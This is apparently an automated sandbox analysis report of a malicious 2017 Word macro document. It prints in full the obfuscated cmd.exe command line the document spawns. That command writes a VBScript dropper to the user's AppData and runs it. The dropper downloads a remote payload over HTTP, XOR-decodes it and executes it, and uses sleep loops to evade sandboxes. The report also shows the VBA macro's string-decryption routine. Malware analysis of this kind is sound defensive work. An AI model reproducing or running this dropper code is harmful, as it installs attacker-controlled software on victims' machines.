---|---|
Stream Path: | VBA/dir |
File Type: | VAX-order 68K Blit (standalone) executable |
Stream Size: | 779 |
Entropy: | 6.43801953066 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . ; Y . . . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . E O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B |
Data Raw: | 01 07 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d4 fa 3b 59 81 10 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:39:18 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xbb0000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:39:32 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | 'C:\Windows\System32\cmd.exe' /V /C set 'GBG=C:\Users\sofwilliams\AppData\Roaming\%RANDOM%.vbs' && (for %i in ('DIm DxF3znV' 'FunCTIoN RM7H(TqP,SUpcFxy)' 'BCGW2=65' 'dIM Qiw,O2ErlP,PEd4' 'Qo1rh7B=85' 'fOr Qiw=1 tO (Len(TqP)/2)' 'O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))' 'PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))' 'RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))' 'NEXt' 'RCTUfL=22' 'EnD fUncTIOn' 'Cllae0=23' 'KyzlwC' 'sUB KyzlwC()' 'OF=45' 'DIm Tw,Jl,WC8fC' 'Ui=84' 'Tw=96824294' 'KNatGfc=89' 'FOr Jl=1 tO Tw' 'WC8fC=WC8fC+1' 'NexT' 'Xt=77' 'iF WC8fC=Tw Then' 'Ep8UXJ=64' 'Mule6z((1336770/4951))' 'DFyX5SF=24' 'PbE0o(RM7H('2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30','WCM'))' 'N08kbpy=70' 'eLsE' 'TeDg=46' 'SG5Ave=28' 'EnD iF' 'TSoUPG=33' 'EnD suB' 'FUnCTIoN XtPB7z2(C9NbQom)' 'PkAKI0E=14' 'XtPB7z2=Chr(C9NbQom)' 'LK=15' 'eND FuNCTiON' 'SuB Wusodn4()' 'XuOFto5=43' 'Dim UQFOGB, KJk' 'For UQFOGB = 38 To 9000267' 'KJk = RyQrP + 83 + 80 + 90' 'Next' 'DVYff=1' 'End sUB' 'SUb M0cJLn()' 'NM=43' 'diM VW,ELc,PCds,BjuC5aE' 'NH=28' 'PCds=''''' 'Mt=19' 'ELc=DxF3znV & TKsHu & RM7H('7D045507','NSp8wZ0')' 'RQwDOV=4' 'MNs9uB DxF3znV,ELc' 'O5t=91' 'iF BjuC5aE='' THen Mule6z(4)' 'L1ksUsW=17' 'VW='SIrWOMB'' 'LwjuV=31' 'SEt BwZn=cREaTeOBject(RM7H('1E21343D24322767213F2A212E',VW))' 'BVv1A=80' 'BwZn.RUn RM7H('2D1C2F6F1D4E266E5E08612B62021C256B635A1661','CNqKAx6') & ELc & PCds,8134-8134,2260-2260' 'TIbnnCE=13' 'End Sub' 'SuB SsQ()' 'P1t=5' 'dIM NgoLmHV,TGr' 'Cv80c3=62' 'Do WhIle NgoLmHV<>5317-5316' 'TGr=TGr+1' 'WSCript.sLEEP(28)' 'Loop' 'D1zerr=83' 'EnD sUB' 'sUb Mule6z(RevOKyJ)' 'WQ50Sb6=91' 'DiM LpZsh' 'QW=34' 'LpZsh=timER+RevOKyJ' 'dO whIle TiMeR<LpZsh' 'wSCRiPt.Sleep(2)' 'Loop' 'Er8g9=8' 'EnD sUB' 'fUNCtion TKsHu()' 'GtkE=70' 'TKsHu=SecONd(TImE)' 'OZgqxC=48' 'enD fUnCTioN' 'FUncTioN PbE0o(SE1cf)' 'ReuR=18' 'dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM' 'YVYNy=1' 'On erroR reSUmE NeXt' 'ARJH8=74' 'CNlxWn='QAMNVmL'' 'R0VOo=25' 'sET RAOx=crEATEobjECT(RM7H('161E2D24043C256F1E26330120',CNlxWn))' 'LRRQfm=62' 'Wusodn4' 'X77kzx=91' 'Set OAmVp=RAOx.ENVirOnMeNT(RM7H('33250E20321230','Acw'))' 'XIzNEID=1' 'DxF3znV=OAmVp(RM7H('13110413131515','WRAT'))&XtPB7z2((830-738))& TKsHu & TKsHu' 'TC3=16' 'EPNWwO='IHCr'' 'I5DpS=10' 'SeT XkSvP=crEatEobJEcT(RM7H('052A113B27301D2F3C6D2A04040B261D18',EPNWwO))' 'KU=48' 'XkSvP.OPen RM7H('0E713D','XI4i0'),SE1cf,9990-9990' 'Ie=16' 'XkSvP.SEtRequeSTheaDer RM7H('1F5409572A','QM5g0OA'),RM7H('3320022422644371686A5B','AQYv')' 'YYYHtq1=70' 'XkSvP.SEnD()' 'X0E0=33' 'if XkSvP.STAtuSTExt=RM7H('13122A371A392F531B2C1D2C261D2C','XCs') then' 'SqN2=57' 'Wusodn4' 'GX=46' 'Mule6z(4)' 'Yad=55' 'FH XkSvP.rEspoNseBoDY' 'MMA=83' 'Else' 'Wuc8=82' 'PQMM='E3rz'' 'X6KS=14' 'SeT XkSvP= creatEoBJECt(RM7H('7E1B19375C011523475C22087F3A2E1163',PQMM))' 'BjdWH=29' 'XkSvP.OpeN RM7H('292B35','Mnna0kE'),RM7H('5E30324074196B2F5423572D355F20182A2344615033685A3E51','N6DF0' ),9751-9751' 'VcHw=29' 'XkSvP.sEtrEqUeSTHEaDEr RM7H('332E0F2804','Oa'),RM7H('542A4628456E077D0F601F','M6S2')' 'VMX=37' 'XkSvP.SEnD()' 'QSABO=86' 'If XkSvP.StatUSTeXT=RM7H('2350304D252E1F110156223B165F36','Os1B9L') tHEn FH XkSvP.responSeBODy' 'I3D=66' 'Jhd=59' 'end if' 'OFqx1=45' 'End FUncTIOn' 'sUb FH(YAuf)' 'Yn=86' 'dIm M5,Y9zz983' 'O9zJmIO=30' 'Y9zz983='XF'' 'PMY=63' 'SEt M5=createObJECt(RM7H('071C091C0476152C343D2735',Y9zz983))' 'VZ1=19' 'M5.OpeN' 'YVIgE=35' 'M5.TYpE=9542-9541' 'FH5xrC=28' 'M5.WritE YAuf' 'WN8ajm=73' 'M5.sAVetoFiLe DxF3znV,5206-5204' 'QKYC=21' 'M5.cLoSE' 'FzUz8m=8' 'M0cJLn' 'Iw6Z=36' 'eND SUb' 'funcTioN MZrD(QAd)' 'JrGZqM=95' 'MZrD=ASc(QAd)' 'GvVffY=48' 'enD FuNcTiON' 'funCTion MNs9uB(LXzuy,NUa)' 'SOv6=61' 'dIm GH7,KJkz,AdyAC,OPkR,Fp(7)' 'KA=45' 'Fp(1)=106' 'IXQyb=39' 'Fp(6)=115' 'CFw=41' 'Fp(2)=118' 'RwOAf4r=86' 'Fp(3)=103' 'U0r=78' 'Fp(7)=111' 'MJ56ht=71' 'Fp(4)=116' 'KTBrm=13' 'Fp(0)=115' 'CtMg=90' 'Fp(5)=104' 'GJQ=89' 'PSKfp1=28' 'sET GH7=cREaTEobjEct(RM7H('002431302538253D206D1F3C2029003E302D302103312D263A21', 'LSGCYUL'))' 'PeN5TC8=50' 'Set KJkz=GH7.gETfilE(LXzuy)' 'XcYZQp=30' 'sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)' 'DXG=52' 'sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)' 'RU0xHi=89' 'dO UntIl OPkR.AtENdOfstrEam' 'AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))' 'LOOp' 'Uu48fY=88' 'AdyAC.CLOse' 'Oc=29' 'OPkR.CLOse' 'FTHurcs=65' 'End fuNCtIOn' 'fUNCtIon KLGYdz(Qtoxg,Fjo)' 'RsgNc=91' 'KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)' 'Pq4oC=28' 'eNd fUnction') do @echo %~i)>'!GBG!' && start '' '!GBG!' |
Imagebase: | 0x4a170000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:39:36 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | 'C:\Windows\System32\WScript.exe' 'C:\Users\sofwilliams\AppData\Roaming\21924.vbs' |
Imagebase: | 0x771a0000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Dim RAOvP() as Byte |
10 | Dim Um56UX(2721 + 6279) as Long, UMU(77732226 / 7774) as Long |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Split | |
Label1 | |
CreateObject | CreateObject("Wscript.Shell") |
Run | IWshShell3.Run("cmd.exe /V /C set "GBG=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm DxF3znV" "FunCTIoN RM7H(TqP,SUpcFxy)" "BCGW2=65" "dIM Qiw,O2ErlP,PEd4" "Qo1rh7B=85" "fOr Qiw=1 tO (Len(TqP)/2)" "O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))" "PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))" "RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))" "NEXt" "RCTUfL=22" "EnD fUncTIOn" "Cllae0=23" "KyzlwC" "sUB KyzlwC()" "OF=45" "DIm Tw,Jl,WC8fC" "Ui=84" "Tw=96824294" "KNatGfc=89" "FOr Jl=1 tO Tw" "WC8fC=WC8fC+1" "NexT" "Xt=77" "iF WC8fC=Tw Then" "Ep8UXJ=64" "Mule6z((1336770/4951))" "DFyX5SF=24" "PbE0o(RM7H("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30","WCM"))" "N08kbpy=70" "eLsE" "TeDg=46" "SG5Ave=28" "EnD iF" "TSoUPG=33" "EnD suB" "FUnCTIoN XtPB7z2(C9NbQom)" "PkAKI0E=14" "XtPB7z2=Chr(C9NbQom)" "LK=15" "eND FuNCTiON" "SuB Wusodn4()" "XuOFto5=43" "Dim UQFOGB, KJk" "For UQFOGB = 38 To 9000267" "KJk = RyQrP + 83 + 80 + 90" "Next" "DVYff=1" "End sUB" "SUb M0cJLn()" "NM=43" "diM VW,ELc,PCds,BjuC5aE" "NH=28" "PCds=""""" "Mt=19" "ELc=DxF3znV & TKsHu & RM7H("7D045507","NSp8wZ0")" "RQwDOV=4" "MNs9uB DxF3znV,ELc" "O5t=91" "iF BjuC5aE="" THen Mule6z(4)" "L1ksUsW=17" "VW="SIrWOMB"" "LwjuV=31" "SEt BwZn=cREaTeOBject(RM7H("1E21343D24322767213F2A212E",VW))" "BVv1A=80" "BwZn.RUn RM7H("2D1C2F6F1D4E266E5E08612B62021C256B635A1661","CNqKAx6") & ELc & PCds,8134-8134,2260-2260" "TIbnnCE=13" "End Sub" "SuB SsQ()" "P1t=5" "dIM NgoLmHV,TGr" "Cv80c3=62" "Do WhIle NgoLmHV<>5317-5316" "TGr=TGr+1" "WSCript.sLEEP(28)" "Loop" "D1zerr=83" "EnD sUB" "sUb Mule6z(RevOKyJ)" "WQ50Sb6=91" "DiM LpZsh" "QW=34" "LpZsh=timER+RevOKyJ" "dO whIle TiMeR<LpZsh" "wSCRiPt.Sleep(2)" "Loop" "Er8g9=8" "EnD sUB" "fUNCtion TKsHu()" "GtkE=70" "TKsHu=SecONd(TImE)" "OZgqxC=48" "enD fUnCTioN" "FUncTioN PbE0o(SE1cf)" "ReuR=18" "dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM" "YVYNy=1" "On erroR reSUmE NeXt" "ARJH8=74" "CNlxWn="QAMNVmL"" "R0VOo=25" "sET RAOx=crEATEobjECT(RM7H("161E2D24043C256F1E26330120",CNlxWn))" "LRRQfm=62" "Wusodn4" "X77kzx=91" "Set OAmVp=RAOx.ENVirOnMeNT(RM7H("33250E20321230","Acw"))" "XIzNEID=1" "DxF3znV=OAmVp(RM7H("13110413131515","WRAT"))&XtPB7z2((830-738))& TKsHu & TKsHu" "TC3=16" "EPNWwO="IHCr"" "I5DpS=10" "SeT XkSvP=crEatEobJEcT(RM7H("052A113B27301D2F3C6D2A04040B261D18",EPNWwO))" "KU=48" "XkSvP.OPen RM7H("0E713D","XI4i0"),SE1cf,9990-9990" "Ie=16" "XkSvP.SEtRequeSTheaDer RM7H("1F5409572A","QM5g0OA"),RM7H("3320022422644371686A5B","AQYv")" "YYYHtq1=70" "XkSvP.SEnD()" "X0E0=33" "if XkSvP.STAtuSTExt=RM7H("13122A371A392F531B2C1D2C261D2C","XCs") then" "SqN2=57" "Wusodn4" "GX=46" "Mule6z(4)" "Yad=55" "FH XkSvP.rEspoNseBoDY" "MMA=83" "Else" "Wuc8=82" "PQMM="E3rz"" "X6KS=14" "SeT XkSvP= creatEoBJECt(RM7H("7E1B19375C011523475C22087F3A2E1163",PQMM))" "BjdWH=29" "XkSvP.OpeN RM7H("292B35","Mnna0kE"),RM7H("5E30324074196B2F5423572D355F20182A2344615033685A3E51","N6DF0" ),9751-9751" "VcHw=29" "XkSvP.sEtrEqUeSTHEaDEr RM7H("332E0F2804","Oa"),RM7H("542A4628456E077D0F601F","M6S2")" "VMX=37" "XkSvP.SEnD()" "QSABO=86" "If XkSvP.StatUSTeXT=RM7H("2350304D252E1F110156223B165F36","Os1B9L") tHEn FH XkSvP.responSeBODy" "I3D=66" "Jhd=59" "end if" "OFqx1=45" "End FUncTIOn" "sUb FH(YAuf)" "Yn=86" "dIm M5,Y9zz983" "O9zJmIO=30" "Y9zz983="XF"" "PMY=63" "SEt M5=createObJECt(RM7H("071C091C0476152C343D2735",Y9zz983))" "VZ1=19" "M5.OpeN" "YVIgE=35" "M5.TYpE=9542-9541" "FH5xrC=28" "M5.WritE YAuf" "WN8ajm=73" "M5.sAVetoFiLe DxF3znV,5206-5204" "QKYC=21" "M5.cLoSE" "FzUz8m=8" "M0cJLn" "Iw6Z=36" "eND SUb" "funcTioN MZrD(QAd)" "JrGZqM=95" "MZrD=ASc(QAd)" "GvVffY=48" "enD FuNcTiON" "funCTion MNs9uB(LXzuy,NUa)" "SOv6=61" "dIm GH7,KJkz,AdyAC,OPkR,Fp(7)" "KA=45" "Fp(1)=106" "IXQyb=39" "Fp(6)=115" "CFw=41" "Fp(2)=118" "RwOAf4r=86" "Fp(3)=103" "U0r=78" "Fp(7)=111" "MJ56ht=71" "Fp(4)=116" "KTBrm=13" "Fp(0)=115" "CtMg=90" "Fp(5)=104" "GJQ=89" "PSKfp1=28" "sET GH7=cREaTEobjEct(RM7H("002431302538253D206D1F3C2029003E302D302103312D263A21", "LSGCYUL"))" "PeN5TC8=50" "Set KJkz=GH7.gETfilE(LXzuy)" "XcYZQp=30" "sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)" "DXG=52" "sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)" "RU0xHi=89" "dO UntIl OPkR.AtENdOfstrEam" "AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))" "LOOp" "Uu48fY=88" "AdyAC.CLOse" "Oc=29" "OPkR.CLOse" "FTHurcs=65" "End fuNCtIOn" "fUNCtIon KLGYdz(Qtoxg,Fjo)" "RsgNc=91" "KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)" "Pq4oC=28" "eNd fUnction") do @echo %~i)>"!GBG!" && start "" "!GBG!"",0,0) -> 0 |
Strings | Decrypted Strings |
---|---|
"Ty1JxNupjQkgl" | |
"Ty1JxNupjQkgl" | |
"Kd4ScVe" | |
"Kd4ScVe" | |
"Oy7cl8WCZ2GANM8ENq9" | |
"Oy7cl8WCZ2GANM8ENq9" | |
"SglmsTsU5MQqX" | |
"SglmsTsU5MQqX" |
Line | Instruction | Meta Information |
---|---|---|
11 | Private Sub K9() | |
13 | Dim YOdozzJ() as String, PBYNz4V as Integer | executed |
14 | YOdozzJ = Split(UserForm1.Label1.Caption, IJ((2301 - 2257))) | Split Label1 |
15 | Redim RAOvP(4461) | |
16 | For PBYNz4V = 0 To 4461 | |
17 | RAOvP(PBYNz4V) = YOdozzJ(PBYNz4V) | |
18 | Next PBYNz4V | |
20 | Dim QqsXx as Long | |
21 | Dim Y38LuKe(12) as Byte, PirzfK(35) as Byte | |
22 | Y38LuKe(0) = 65 | |
23 | Y38LuKe(1) = 150 | |
24 | Y38LuKe(2) = 162 | |
26 | Y38LuKe(3) = 97 | |
27 | Y38LuKe(4) = 218 | |
28 | Y38LuKe(5) = 55 | |
30 | Y38LuKe(6) = 35 | |
31 | Y38LuKe(7) = 181 | |
32 | Y38LuKe(8) = 86 | |
34 | Y38LuKe(9) = 95 | |
35 | Y38LuKe(10) = 173 | |
36 | Y38LuKe(11) = 73 | |
37 | Y38LuKe(12) = 102 | |
39 | PirzfK(0) = 71 | |
40 | PirzfK(1) = 68 | |
41 | PirzfK(2) = 76 | |
42 | PirzfK(3) = 76 | |
43 | PirzfK(4) = 56 | |
44 | PirzfK(5) = 89 | |
46 | PirzfK(6) = 78 | |
47 | PirzfK(7) = 102 | |
48 | PirzfK(8) = 104 | |
49 | PirzfK(9) = 71 | |
50 | PirzfK(10) = 84 | |
52 | PirzfK(11) = 52 | |
53 | PirzfK(12) = 99 | |
54 | PirzfK(13) = 98 | |
56 | PirzfK(14) = 104 | |
57 | PirzfK(15) = 87 | |
58 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
59 | PirzfK(16) = JaY8xys(QqsXx, 1) | |
60 | PirzfK(17) = JaY8xys(QqsXx, 2) | |
61 | PirzfK(18) = JaY8xys(QqsXx, 3) | |
63 | PirzfK(19) = JaY8xys(QqsXx, 4) | |
64 | PirzfK(20) = PirzfK(16) | |
65 | PirzfK(21) = PirzfK(17) | |
66 | PirzfK(22) = PirzfK(18) | |
67 | PirzfK(23) = PirzfK(19) | |
69 | PirzfK(24) = PirzfK(16) | |
70 | PirzfK(25) = PirzfK(17) | |
71 | PirzfK(26) = PirzfK(18) | |
72 | PirzfK(27) = PirzfK(19) | |
74 | PirzfK(28) = PirzfK(16) | |
75 | PirzfK(29) = PirzfK(17) | |
76 | PirzfK(30) = PirzfK(18) | |
78 | PirzfK(31) = PirzfK(19) | |
79 | PirzfK(32) = PirzfK(16) | |
80 | PirzfK(33) = PirzfK(17) | |
82 | PirzfK(34) = PirzfK(18) | |
83 | PirzfK(35) = PirzfK(19) | |
84 | If Ks86hO(Y38LuKe, PirzfK) = "Ty1JxNupjQkgl" Then | |
84 | Exit For | |
84 | Endif | |
86 | Next QqsXx | |
87 | Dim UWMo1(6) as Byte, NvR9c9m(31) as Byte | |
88 | UWMo1(0) = 213 | |
90 | UWMo1(1) = 223 | |
91 | UWMo1(2) = 225 | |
92 | UWMo1(3) = 191 | |
93 | UWMo1(4) = 201 | |
95 | UWMo1(5) = 52 | |
96 | UWMo1(6) = 124 | |
97 | NvR9c9m(0) = 69 | |
98 | NvR9c9m(1) = 110 | |
99 | NvR9c9m(2) = 51 | |
101 | NvR9c9m(3) = 49 | |
102 | NvR9c9m(4) = 78 | |
103 | NvR9c9m(5) = 85 | |
104 | NvR9c9m(6) = 69 | |
105 | NvR9c9m(7) = 53 | |
106 | NvR9c9m(8) = 114 | |
108 | NvR9c9m(9) = 55 | |
109 | NvR9c9m(10) = 85 | |
110 | NvR9c9m(11) = 56 | |
111 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
112 | NvR9c9m(12) = JaY8xys(QqsXx, 1) | |
113 | NvR9c9m(13) = JaY8xys(QqsXx, 2) | |
115 | NvR9c9m(14) = JaY8xys(QqsXx, 3) | |
116 | NvR9c9m(15) = JaY8xys(QqsXx, 4) | |
117 | NvR9c9m(16) = NvR9c9m(12) | |
118 | NvR9c9m(17) = NvR9c9m(13) | |
119 | NvR9c9m(18) = NvR9c9m(14) | |
120 | NvR9c9m(19) = NvR9c9m(15) | |
122 | NvR9c9m(20) = NvR9c9m(12) | |
123 | NvR9c9m(21) = NvR9c9m(13) | |
124 | NvR9c9m(22) = NvR9c9m(14) | |
125 | NvR9c9m(23) = NvR9c9m(15) | |
126 | NvR9c9m(24) = NvR9c9m(12) | |
128 | NvR9c9m(25) = NvR9c9m(13) | |
129 | NvR9c9m(26) = NvR9c9m(14) | |
130 | NvR9c9m(27) = NvR9c9m(15) | |
131 | NvR9c9m(28) = NvR9c9m(12) | |
132 | NvR9c9m(29) = NvR9c9m(13) | |
133 | NvR9c9m(30) = NvR9c9m(14) | |
135 | NvR9c9m(31) = NvR9c9m(15) | |
136 | If Ks86hO(UWMo1, NvR9c9m) = "Kd4ScVe" Then | |
136 | Exit For | |
136 | Endif | |
137 | Next QqsXx | |
138 | Dim En4vH(18) as Byte, L5YvhA(31) as Byte | |
140 | En4vH(0) = 119 | |
141 | En4vH(1) = 209 | |
142 | En4vH(2) = 222 | |
143 | En4vH(3) = 236 | |
145 | En4vH(4) = 24 | |
146 | En4vH(5) = 85 | |
147 | En4vH(6) = 70 | |
148 | En4vH(7) = 221 | |
150 | En4vH(8) = 244 | |
151 | En4vH(9) = 132 | |
152 | En4vH(10) = 243 | |
153 | En4vH(11) = 62 | |
154 | En4vH(12) = 188 | |
155 | En4vH(13) = 143 | |
157 | En4vH(14) = 69 | |
158 | En4vH(15) = 4 | |
159 | En4vH(16) = 202 | |
160 | En4vH(17) = 225 | |
161 | En4vH(18) = 231 | |
163 | L5YvhA(0) = 83 | |
164 | L5YvhA(1) = 109 | |
165 | L5YvhA(2) = 74 | |
167 | L5YvhA(3) = 74 | |
168 | L5YvhA(4) = 110 | |
169 | L5YvhA(5) = 86 | |
170 | L5YvhA(6) = 72 | |
171 | L5YvhA(7) = 79 | |
172 | L5YvhA(8) = 105 | |
174 | L5YvhA(9) = 79 | |
175 | L5YvhA(10) = 75 | |
176 | L5YvhA(11) = 73 | |
178 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
179 | L5YvhA(12) = JaY8xys(QqsXx, 1) | |
180 | L5YvhA(13) = JaY8xys(QqsXx, 2) | |
181 | L5YvhA(14) = JaY8xys(QqsXx, 3) | |
182 | L5YvhA(15) = JaY8xys(QqsXx, 4) | |
183 | L5YvhA(16) = L5YvhA(12) | |
185 | L5YvhA(17) = L5YvhA(13) | |
186 | L5YvhA(18) = L5YvhA(14) | |
187 | L5YvhA(19) = L5YvhA(15) | |
188 | L5YvhA(20) = L5YvhA(12) | |
189 | L5YvhA(21) = L5YvhA(13) | |
191 | L5YvhA(22) = L5YvhA(14) | |
192 | L5YvhA(23) = L5YvhA(15) | |
193 | L5YvhA(24) = L5YvhA(12) | |
194 | L5YvhA(25) = L5YvhA(13) | |
195 | L5YvhA(26) = L5YvhA(14) | |
196 | L5YvhA(27) = L5YvhA(15) | |
198 | L5YvhA(28) = L5YvhA(12) | |
199 | L5YvhA(29) = L5YvhA(13) | |
200 | L5YvhA(30) = L5YvhA(14) | |
201 | L5YvhA(31) = L5YvhA(15) | |
203 | If Ks86hO(En4vH, L5YvhA) = "Oy7cl8WCZ2GANM8ENq9" Then | |
203 | Exit For | |
203 | Endif | |
204 | Next QqsXx | |
205 | Dim Sk(12) as Byte, PczKQW(31) as Byte | |
207 | Sk(0) = 88 | |
208 | Sk(1) = 173 | |
209 | Sk(2) = 159 | |
210 | Sk(3) = 123 | |
212 | Sk(4) = 228 | |
213 | Sk(5) = 187 | |
214 | Sk(6) = 149 | |
215 | Sk(7) = 78 | |
216 | Sk(8) = 213 | |
218 | Sk(9) = 129 | |
219 | Sk(10) = 47 | |
220 | Sk(11) = 224 | |
221 | Sk(12) = 196 | |
223 | PczKQW(0) = 71 | |
224 | PczKQW(1) = 114 | |
225 | PczKQW(2) = 107 | |
227 | PczKQW(3) = 79 | |
228 | PczKQW(4) = 86 | |
229 | PczKQW(5) = 111 | |
230 | PczKQW(6) = 118 | |
231 | PczKQW(7) = 81 | |
232 | PczKQW(8) = 101 | |
234 | PczKQW(9) = 57 | |
235 | PczKQW(10) = 69 | |
236 | PczKQW(11) = 84 | |
237 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
239 | PczKQW(12) = JaY8xys(QqsXx, 1) | |
240 | PczKQW(13) = JaY8xys(QqsXx, 2) | |
241 | PczKQW(14) = JaY8xys(QqsXx, 3) | |
243 | PczKQW(15) = JaY8xys(QqsXx, 4) | |
244 | PczKQW(16) = PczKQW(12) | |
245 | PczKQW(17) = PczKQW(13) | |
246 | PczKQW(18) = PczKQW(14) | |
247 | PczKQW(19) = PczKQW(15) | |
249 | PczKQW(20) = PczKQW(12) | |
250 | PczKQW(21) = PczKQW(13) | |
251 | PczKQW(22) = PczKQW(14) | |
252 | PczKQW(23) = PczKQW(15) | |
253 | PczKQW(24) = PczKQW(12) | |
254 | PczKQW(25) = PczKQW(13) | |
256 | PczKQW(26) = PczKQW(14) | |
257 | PczKQW(27) = PczKQW(15) | |
258 | PczKQW(28) = PczKQW(12) | |
259 | PczKQW(29) = PczKQW(13) | |
260 | PczKQW(30) = PczKQW(14) | |
262 | PczKQW(31) = PczKQW(15) | |
263 | If Ks86hO(Sk, PczKQW) = "SglmsTsU5MQqX" Then | |
263 | Exit For | |
263 | Endif | |
264 | Next QqsXx | |
265 | Dim Kd5J(131) as Byte, Q0l5YJC as Long, PW8gBif as Long | |
266 | Q0l5YJC = 0 | |
267 | PW8gBif = 0 | |
269 | For QqsXx = 0 To GzYTO(PirzfK) | |
270 | Kd5J(QqsXx) = PirzfK(QqsXx) | |
271 | Q0l5YJC = Q0l5YJC + 1 | |
273 | Next QqsXx | |
274 | For QqsXx = GzYTO(PirzfK) + 1 To GzYTO(NvR9c9m) + Q0l5YJC | |
275 | Kd5J(QqsXx) = NvR9c9m(PW8gBif) | |
277 | PW8gBif = PW8gBif + 1 | |
278 | Q0l5YJC = Q0l5YJC + 1 | |
279 | Next QqsXx | |
280 | PW8gBif = 0 | |
281 | For QqsXx = Q0l5YJC To GzYTO(L5YvhA) + Q0l5YJC | |
282 | Kd5J(QqsXx) = L5YvhA(PW8gBif) | |
284 | PW8gBif = PW8gBif + 1 | |
285 | Q0l5YJC = Q0l5YJC + 1 | |
286 | Next QqsXx | |
287 | PW8gBif = 0 | |
288 | For QqsXx = Q0l5YJC To GzYTO(PczKQW) + Q0l5YJC | |
289 | Kd5J(QqsXx) = PczKQW(PW8gBif) | |
291 | PW8gBif = PW8gBif + 1 | |
292 | Q0l5YJC = Q0l5YJC + 1 | |
293 | Next QqsXx | |
294 | B6BznN = Ks86hO(RAOvP, Kd5J) | |
295 | Dim C9og3f(12) as Byte, UGc(1) as Byte | |
296 | C9og3f(0) = 216 | |
298 | C9og3f(1) = 62 | |
299 | C9og3f(2) = 79 | |
300 | C9og3f(3) = 164 | |
301 | C9og3f(4) = 35 | |
302 | C9og3f(5) = 163 | |
304 | C9og3f(6) = 39 | |
305 | C9og3f(7) = 130 | |
306 | C9og3f(8) = 21 | |
307 | C9og3f(9) = 2 | |
308 | C9og3f(10) = 7 | |
310 | C9og3f(11) = 174 | |
311 | C9og3f(12) = 211 | |
312 | UGc(0) = 65 | |
313 | UGc(1) = 114 | |
314 | Dim DFfKIT as Object | |
315 | Set DFfKIT = CreateObject(Ks86hO(C9og3f, UGc)) | CreateObject("Wscript.Shell") executed |
